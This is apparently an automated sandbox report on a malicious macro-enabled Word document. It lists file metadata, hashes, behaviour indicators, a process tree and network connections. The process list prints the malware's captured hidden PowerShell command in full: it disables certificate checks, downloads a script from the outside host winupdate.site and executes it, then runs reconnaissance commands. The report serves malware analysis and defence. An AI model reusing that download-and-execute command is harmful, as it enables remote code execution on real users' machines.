analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ce0d8f9a7cc76e9a6137f782a6733ec6a041df91ddda3a9b3cdda65a61b73a4e

Full analysis: https://app.any.run/tasks/5ad01e5c-f641-4c42-b40d-c2cc35bd62df
Verdict: Malicious activity
Analysis date: October 14, 2019, 01:41:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 936, Author: Win10vul2, Template: Normal, Last Saved By: Administrator, Revision Number: 102, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:49:00, Create Time/Date: Tue Sep 17 04:06:00 2019, Last Saved Time/Date: Sat Oct 12 12:36:00 2019, Number of Pages: 3, Number of Words: 150, Number of Characters: 856, Security: 0
MD5:

90B33C691919B65559C1D8B534DA73FF

SHA1:

CF47BD562EDB68262F6F2C7A7131A2828112401C

SHA256:

CE0D8F9A7CC76E9A6137F782A6733EC6A041DF91DDDA3A9B3CDDA65A61B73A4E

SSDEEP:

384:pBEG68VWiRx1miSgq03gsJi5fNMt4Y8LQejJJAwbEDoIyMwtw7ev50EcA0j2CsEH:pBZVZRx1A03gjZdnn0Q1A

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Loads the Task Scheduler COM API

      • mmc.exe (PID: 2424)
    • Starts Visual C# compiler

      • powershell.exe (PID: 1952)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 1952)
    • PowerShell script executed

      • powershell.exe (PID: 1952)
    • Creates files in the user directory

      • powershell.exe (PID: 1952)
    • Reads Internet Cache Settings

      • powershell.exe (PID: 1952)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 1952)
    • Uses IPCONFIG.EXE to discover IP address

      • cmd.exe (PID: 2580)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2720)
    • Reads settings of System Certificates

      • powershell.exe (PID: 1952)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2720)
    • Manual execution by user

      • CompMgmtLauncher.exe (PID: 2440)
      • CompMgmtLauncher.exe (PID: 3352)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Win10vul2
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: Administrator
RevisionNumber: 102
Software: Microsoft Office Word
TotalEditTime: 1.8 hours
CreateDate: 2019:09:17 03:06:00
ModifyDate: 2019:10:12 11:36:00
Pages: 3
Words: 150
Characters: 856
Security: None
CodePage: Windows Simplified Chinese (PRC, Singapore)
Company: -
Lines: 7
Paragraphs: 2
CharCountWithSpaces: 1004
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
CompObjUserTypeLen: 28
CompObjUserType: Microsoft Word 97-2003 ?ĵ?
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
10
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe csc.exe cvtres.exe no specs compmgmtlauncher.exe no specs compmgmtlauncher.exe mmc.exe cmd.exe no specs ipconfig.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2720"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\ce0d8f9a7cc76e9a6137f782a6733ec6a041df91ddda3a9b3cdda65a61b73a4e.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1952powershell.exe -nop -w hidden -c " [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $wc = New-Object System.Net.WebClient; $wc.Headers.set('user-Agent','Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08'); $jpg = $wc.downloadstring('https://winupdate.site:443/updates'); IEX $jpg; " C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1764"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\rpngq5pa.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
388C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESC3E8.tmp" "c:\Users\admin\AppData\Local\Temp\CSCC3E7.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
3352"C:\Windows\system32\CompMgmtLauncher.exe" C:\Windows\system32\CompMgmtLauncher.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Computer Management Snapin Launcher
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2440"C:\Windows\system32\CompMgmtLauncher.exe" C:\Windows\system32\CompMgmtLauncher.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Computer Management Snapin Launcher
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2424"C:\Windows\system32\mmc.exe" "C:\Windows\system32\compmgmt.msc" /sC:\Windows\system32\mmc.exe
CompMgmtLauncher.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft Management Console
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2580C:\Windows\system32\cmd.exe /C ipconfigC:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1704ipconfigC:\Windows\system32\ipconfig.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
IP Configuration Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2864C:\Windows\system32\cmd.exe /C whoa,iC:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 632
Read events
1 228
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
4
Unknown types
4

Dropped files

PID
Process
Filename
Type
2720WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA766.tmp.cvr
MD5:
SHA256:
2720WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFAA40B4773D8D43A7.TMP
MD5:
SHA256:
2720WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF480ACE5A8E0FA3E3.TMP
MD5:
SHA256:
1952powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GUQXK2PQPL2RDJVFQB0C.temp
MD5:
SHA256:
1764csc.exeC:\Users\admin\AppData\Local\Temp\CSCC3E7.tmp
MD5:
SHA256:
388cvtres.exeC:\Users\admin\AppData\Local\Temp\RESC3E8.tmp
MD5:
SHA256:
1764csc.exeC:\Users\admin\AppData\Local\Temp\rpngq5pa.dll
MD5:
SHA256:
1764csc.exeC:\Users\admin\AppData\Local\Temp\rpngq5pa.out
MD5:
SHA256:
2720WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:45822EE62FC571A3151895E367644231
SHA256:EB3C643FA978D554A4FC475FB2EC2D439467CBEED53546B5218462C2B3EC2CB5
1952powershell.exeC:\Users\admin\AppData\Local\Temp\rpngq5pa.cmdlinetext
MD5:925A417AD5F74BE86C8D44DC4E6CB78E
SHA256:BCC7927D914B0E377FF79BA775B840FE643C022D063DC909FF59FC774B800743
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
28
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1952
powershell.exe
154.223.180.21:443
winupdate.site
MULTACOM CORPORATION
US
unknown

DNS requests

Domain
IP
Reputation
winupdate.site
  • 154.223.180.21
suspicious

Threats

No threats detected
Process
Message
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144